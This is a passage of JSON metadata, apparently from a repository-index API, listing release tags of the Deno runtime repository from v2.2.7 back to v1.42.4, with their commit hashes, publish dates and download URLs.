https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"pur